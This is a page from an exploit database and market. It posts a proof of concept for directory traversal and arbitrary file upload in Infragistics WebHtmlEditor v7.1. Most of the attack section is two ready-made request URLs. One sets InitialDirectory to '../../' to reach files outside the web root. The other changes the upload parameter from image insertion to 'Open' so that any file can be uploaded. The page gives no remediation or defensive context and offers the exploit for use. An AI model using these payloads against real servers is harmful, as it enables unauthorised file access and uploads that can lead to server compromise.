[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Infragistics WebHtmlEditor.v7.1 Arbitrary File upload vulnerability

Author
SpeeDr00t
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10855
Category
web applications
Date add
12-02-2010
Platform
unsorted
===================================================================
Infragistics WebHtmlEditor.v7.1 Arbitrary File upload vulnerability
===================================================================


proof of concept by KyoungChip, Jang ( SpeeDr00t )

[*] the bug    
    : directory Traversal  and Arbitrary File upload vulnerability

[*] application
    : Infragistics WebHtmlEditor.v7.1

[*] Vendor URL  
    : http://www.infragistics.com


[*] homepage
    : cafe.naver.com/cwithme
      
[*] company
    : sk юн4sec

[*] Group
    : canvasTeam@SpeeDr00t

[*] Thank for
    : my wife(en hee) , my son(ju en, do en ), Zero-0x77, hoon


# directory Traversal  vulnerability

A directory traversal vulnerability exists in Infragistics WebHtmlEditor.v7.1
which allows a remote user to view files local to the target server.

The parameters of the InitialDirectory ( InitialDirectory =../../ )
This form of attack can be manipulated directory travel.

poc ) InitialDirectory = ../../

ex)
http://victim/test.aspx?lang=&iged_uploadid=InsertImage&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor


# Arbitrary File upload vulnerability
The parameters of the InsertImage the iged_uploadid can upload image files, but
Open an attacker to change the parameters iged_uploadid Arbitrary File upload it enables.


http://victim/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor



#  0day.today [2024-09-29]  #